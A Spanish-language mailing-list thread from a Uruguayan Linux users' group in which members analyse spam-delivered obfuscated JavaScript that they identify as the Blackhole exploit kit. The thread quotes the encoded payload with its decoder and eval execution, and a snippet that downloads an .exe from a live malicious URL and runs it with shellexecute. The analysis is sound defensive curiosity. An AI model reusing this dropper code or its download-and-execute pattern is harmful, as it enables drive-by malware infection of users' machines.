<html>
<head>
<meta content="text/html; charset=ISO-8859-1"
http-equiv="Content-Type">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<font face="DejaVu Serif"><br>
Tengo curiosidad... ¿Para qué es que venden ese código? ¿y para
qué lo compran esas otras personas?<br>
<br>
<br>
<i>Disculpen la ignorancia<br>
<b>Sylvia</b><br>
</i><br>
</font>
<div class="moz-cite-prefix">El 10/10/12 23:38, Pedro Worcel
escribió:<br>
</div>
<blockquote
cite="mid:CAPS+U982xfQOG_ThBAqW5dLo3G7gOS1sT5m6NNkaf2sfhDOz0Q@mail.gmail.com"
type="cite">Copiando el codigo y pegandolo en google, parece que
se trata de un blackhole exploit kit!<br>
<br>
<a moz-do-not-send="true"
href="https://www.google.co.nz/search?q=pdfver+%3D+pdfver.split%28%27.%27%29&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-nightly">https://www.google.co.nz/search?q=pdfver+%3D+pdfver.split%28%27.%27%29&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-nightly</a><br>
<br>
Aca hay <a moz-do-not-send="true"
href="http://www.google.co.nz/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CDYQFjAD&url=http%3A%2F%2Fwww.sophos.com%2Fen-us%2Fmedialibrary%2FPDFs%2Ftechnical%2520papers%2Fsophosblackholeexploitkit.pdf%3Fdl%3Dtrue&ei=xiB2UOyNKeW0iQfOroGYBg&usg=AFQjCNGhR2wjkJTPWwAG5qrcMSJLxsqa0Q&cad=rja">un
pdf</a> respecto al tema, que no puedo leer porque se supone
estoy trabajando :P Hay unos chabones que los crean, y despues la
gente compra el software y lo distribuye por sus propios medios.<br>
<br>
<br>
<blockquote style="margin:0px 0px 0px 0.8ex;border-left:1px solid
rgb(204,204,204);padding-left:1ex" class="gmail_quote">¡pah! qué
socotroco de código. La mayor parte parece tener que ver con
verificar la presencia de algún plugin del navegador. Pero al
final baja algo e intenta ejecutarlo en un shell: <br>
<br>
var ra4 = ".//..//757736c.exe" <br>
[...] <br>
ra2.open("GET", <a moz-do-not-send="true"
href="http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz"
target="_blank">"http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz"</a>,
false); <br>
[...] <br>
with(ra1) { <br>
shellexecute(ra4); <br>
} <br>
<br>
¿es posible hacer esto desde javascript? ¿bajar un ejecutable y
ejecutarlo desde un shell? <br>
<br>
saludos <br>
<br>
Kenneth <br>
</blockquote>
<div><br>
Estas personas -- locos de mierda -- parecen pensar que si: <br>
<br>
<a moz-do-not-send="true"
href="http://stackoverflow.com/questions/10186813/how-to-run-cmd-exe-with-parameters-from-javascript">http://stackoverflow.com/questions/10186813/how-to-run-cmd-exe-with-parameters-from-javascript</a><br>
<a moz-do-not-send="true"
href="http://stackoverflow.com/questions/3152482/running-exe-from-javascript">http://stackoverflow.com/questions/3152482/running-exe-from-javascript</a><br>
<br>
Es raro, porque shellexecute no esta definido en el codigo que
estamos viendo, y los ejemplos en stack overflow estan en
mayusculas. Quizas ese GET este agregando un elemento al DOM que
contenga la funcion shellexecute? <br>
<br>
Un abrazo!<br>
Pedro<br>
</div>
<br>
<div class="gmail_quote">El 11 de octubre de 2012 14:20, Carlos M.
Martinez <span dir="ltr"><<a moz-do-not-send="true"
href="mailto:carlosmarcelomartinez@gmail.com"
target="_blank">carlosmarcelomartinez@gmail.com</a>></span>
escribió:<br>
<blockquote class="gmail_quote" style="margin:0 0 0
.8ex;border-left:1px #ccc solid;padding-left:1ex">
<div bgcolor="#FFFFFF" text="#000000"> Hace otras cosas
tambien, que aparentemente involucran ActiveX, pero no lo
segui a fondo.<br>
<br>
Muy bueno lo de Pedro :-)<br>
<br>
~C.<br>
<br>
<div>On 10/10/12 9:07 PM, Kenneth Irving wrote:<br>
</div>
<blockquote type="cite"> <br>
¡pah! qué socotroco de código. La mayor parte parece tener
que ver con verificar la presencia de algún plugin del
navegador. Pero al final baja algo e intenta ejecutarlo en
un shell: <br>
<div class="im"> <br>
var ra4 = ".//..//757736c.exe" <br>
[...] <br>
ra2.open("GET", <a moz-do-not-send="true"
href="http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz"
target="_blank">"http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz"</a>,
false); <br>
[...] <br>
with(ra1) { <br>
shellexecute(ra4); <br>
} <br>
<br>
¿es posible hacer esto desde javascript? ¿bajar un
ejecutable y ejecutarlo desde un shell? <br>
<br>
saludos <br>
<br>
Kenneth <br>
<br>
On Thu, 11 Oct 2012, Pedro Worcel wrote: <br>
<br>
</div>
<blockquote type="cite">
<div>
<div class="h5">Hola gente! <br>
<br>
Aprovecho este post para presentarme, soy Pedro,
estoy programando ahora en Nueva Zelanda pero me
crie en Mercedes, y estudie en la <br>
UTU. Me paso mi viejo un link de esta conversacion
me parecio interesante y ahora me anote para UYLUG.
Tambien me anote un poco porque <br>
me impresiono que se vaya a organizar un evento a
nivel Latinoamericano de la OWASP en Montevideo, muy
groso. <br>
<br>
La verdad que no entiendo como codifica el malware
el javascript, pero no hace falta saberlo porque al
final el mismo lo decodifica y <br>
lo manda a un eval. <br>
<br>
Para poder trabajar con el lo descargue desde la
linea de comandos y lo edite con vim. Reemplace
todas las ocurrencias de eval por <br>
console.log y luego copie los contenidos de el
firebug en el pastebin y lo hice mas lindo. <br>
<br>
El codigo del malware esta aca: <br>
<br>
<a moz-do-not-send="true"
href="http://pastie.org/5032658" target="_blank">http://pastie.org/5032658</a>
<br>
<br>
Y adjunto el malware, segun yo, neutralizado. (no
garantizo nada eh) <br>
<br>
Saludos! <br>
Pedro <br>
<br>
---------- Mensaje reenviado ---------- <br>
De: Kenneth Irving <a moz-do-not-send="true"
href="mailto:ken@fq.edu.uy" target="_blank"><ken@fq.edu.uy></a>
<br>
Fecha: 10 de octubre de 2012 19:25 <br>
Asunto: [uylug-varios] ataques curiosos <br>
Para: UYLUG <a moz-do-not-send="true"
href="mailto:uylug-varios@uylug.org.uy"
target="_blank"><uylug-varios@uylug.org.uy></a>
<br>
<br>
<br>
<br>
Hace un tiempo que de tanto en tanto recibo spam que
parece diverso (el último era un boletín de noticias
trucho de CNN), pero que <br>
termina siempre en algo parecido. Son emails que
siempre tienen algún link que te baja un HTML que
contiene en su interior 3 o 4 links <br>
que te bajan un código Javascript, que lo único que
hace es bajar algún otro archivo, este sí un HTML
que contiene el código malicioso <br>
en javascript. <br>
<br>
Paso el link final para bajar el código malicioso de
javascript: <br>
<br>
<a moz-do-not-send="true"
href="http://2.cmisdfoundation.com/links/persons_jobs.php"
target="_blank">http://2.cmisdfoundation.com/links/persons_jobs.php</a>
<br>
<br>
y trascribo sólo parte del código. El código
comienza con esto: <br>
<br>
------------------------- comienzo
--------------------------------- <br>
<html><head><title></title></head><body><div
<br>
</div>
</div>
<div class="im">
dqa="asd"></div><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");}</script><div
58="16#31193r341e*34393m1e36!3f333l3j18^193t3t3331_3k33381836$193r3t3i35(3k3l3i3e10@321v331e36&393i3j3k23+38393c341q%3e3l3c3c3t)1c3j353k2j#3k3
<br>
p3c351q*363l3e333k!393f3e1832^1c37193r3m_313i10361t$321e3j3k3p(3c351c311c@341c331t3k&38393j1r39+3618361616%37193r363f)3i18311t1g#1r311s371e*3
<br>
c353e373k!381r311t31^" <br>
44="!38253m353e^3k18123f3e_121b341c33$193t353c3j(353r321t31@2r123f3e12&1b342t1r31+2r123f3e12%1b342t1t35)1e3n393e28#313e343c35*3i18331c32!193t3t3t3t^1c3n393e28_313e343c35$3i1q363l3e(333k393f3e@18341c3319&3r3i353k3l+3i3e10363l%3e333k393f)3e18193r34#18191r3936*1
<br>
83k3p3g35!3f3610331t^1t12363l3e_333k393f3e$12" <br>
49="42e3f34@353j2r382t&1r3k3i3p3r+331e3i353d%3f3m352338)393c341837#193t33313k*3338183619!3r3t3t3t39^361833193r_3k3i3p3r34$1e34393m1e(3i353d3f3m@352338393c&341833193t+33313k3338%1836193r3t)3t3t3t3936#1811341e34*393m193r31!1t343f333l^3d3
<br>
53e3k1e_37353k253c$353d353e3k(223p293418@341e34393m&2924191r39+361831"
<br>
22="!18331c3219^3t3t3t3t1c_393e393k2j$333i393g3k(1q363l3e33@3k393f3e18&193r3m313i+10331t3k38%393j1c311t)3e313m3937#313k3f3i1c*351t121f12!1c361c391t^311e3l3j35_3i2137353e$3k3s3s1212(1c371t311e@3m353e343f&3i3s3s12
<br>
</div>
<div>
<div class="h5">
12+1c321t311e%3g3c313k36)3f3i3d3s3s#12121c381t*311e3g3i3f!343l333k3s^3s12121r33_1e393e393k$2f"
<br>
------------------------ [código cortado]
--------------------------- <br>
<br>
El bloque de datos codificados continúa, y el
archivo termina con esto: <br>
------------------------ [continuación]
----------------------------- <br>
65="53i)23313j3518#191e3i353g*3c31333518 <br>
!1f2s3j1f37^1c1212191r_3h1t361b37$1b17103n39(343k381t12@171b3b1e3g&3c3l37393e+2j393q351b%1712103835)3937383k1t#12171b3b1e*3g3c3l3739!3e2j393q
<br>
<br>
35^1b17121017_1r3h1b1t17$3j3k3p3c35(1t12171b39@1b1734393j&3g3c313p1q+393e3c393e%351r121017)1r363f3i18#3f1t1g1r3f*1s321e3c35"></div><script>
<br>
if(020==0x10)a=document.getElementsByTagName(dd)[1];
<br>
s=""; <br>
for(i=0;;i++){ <br>
if(window.document)r=a.getAttribute(i); <br>
if(r){s=s+r;}else break; <br>
} <br>
a=s; <br>
asd(); <br>
s=""; <br>
for(i=0;i<a.length;i+=2){ <br>
s+=String.fromCharCode(parseInt(a.substr(i,2),32));
<br>
} <br>
c=s; <br>
e=eval; <br>
try{if(020==0x10)("321".substr+"zxc")();}catch(gdsgdsg){e(c);}
<br>
</script></body></html> <br>
-------------------- fin
------------------------------- <br>
<br>
Esto lo paso sólo como muestra y para no publicar el
socotroco completo. Es más práctico simplemente
bajarlo desde el link original. <br>
<br>
Es obvio que el bloque de datos codificados e
decodificado en el código javascript final, y luego
de decodificarlo se ejecuta con el <br>
"e(c)". <br>
<br>
Imagino que debe tratarse de código javascript
ofuscado para explotar alguna debilidad de algún
navegador o algún cliente de email, <br>
pero mis pobres conocimientos de javascript no me
han permitido decodificar esto sin riesgo, por lo
que lo publico en esta lista, tal <br>
vez alguien con suficiente curiosidad pueda
decodificarlo y hacernos saber de qué se trata. Es
simplemente curiosidad, me resultó muy <br>
interesante el trabajo que se toman para ocultar el
código malicioso. <br>
<br>
saludos <br>
<br>
Kenneth <br>
_______________________________________________ <br>
Uylug-varios mailing list <br>
<a moz-do-not-send="true"
href="mailto:Uylug-varios@listas.uylug.org.uy"
target="_blank">Uylug-varios@listas.uylug.org.uy</a>
<br>
<a moz-do-not-send="true"
href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy"
target="_blank">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a>
<br>
<br>
<br>
-- <br>
<a moz-do-not-send="true" href="http://is.gd/droope"
target="_blank">http://is.gd/droope</a> <br>
<br>
<br>
</div>
</div>
</blockquote>
<div>
<div class="h5"> <br>
<fieldset></fieldset>
<br>
<pre>_______________________________________________
Uylug-varios mailing list
<a moz-do-not-send="true" href="mailto:Uylug-varios@listas.uylug.org.uy" target="_blank">Uylug-varios@listas.uylug.org.uy</a>
<a moz-do-not-send="true" href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy" target="_blank">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a>
</pre>
<br>
<fieldset></fieldset>
<br>
<pre>_______________________________________________
Uylug-varios mailing list
<a moz-do-not-send="true" href="mailto:Uylug-varios@listas.uylug.org.uy" target="_blank">Uylug-varios@listas.uylug.org.uy</a>
<a moz-do-not-send="true" href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy" target="_blank">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a>
</pre>
</div>
</div>
</blockquote>
<br>
</div>
<br>
_______________________________________________<br>
Uylug-varios mailing list<br>
<a moz-do-not-send="true"
href="mailto:Uylug-varios@listas.uylug.org.uy">Uylug-varios@listas.uylug.org.uy</a><br>
<a moz-do-not-send="true"
href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy"
target="_blank">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a><br>
<br>
</blockquote>
</div>
<br>
<br clear="all">
<br>
-- <br>
<a moz-do-not-send="true" href="http://is.gd/signature_"
target="_blank">http://is.gd/droope</a><br>
<br>
<fieldset class="mimeAttachmentHeader"></fieldset>
<br>
<pre wrap="">_______________________________________________
Uylug-varios mailing list
<a class="moz-txt-link-abbreviated" href="mailto:Uylug-varios@listas.uylug.org.uy">Uylug-varios@listas.uylug.org.uy</a>
<a class="moz-txt-link-freetext" href="http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy">http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy</a>
</pre>
</blockquote>
<br>
</body>
</html>